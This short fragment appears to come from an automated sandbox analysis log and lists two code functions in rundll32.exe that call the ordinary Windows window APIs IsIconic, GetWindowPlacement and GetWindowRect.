Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100134F0 IsIconic,	11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,	11_2_10018C9A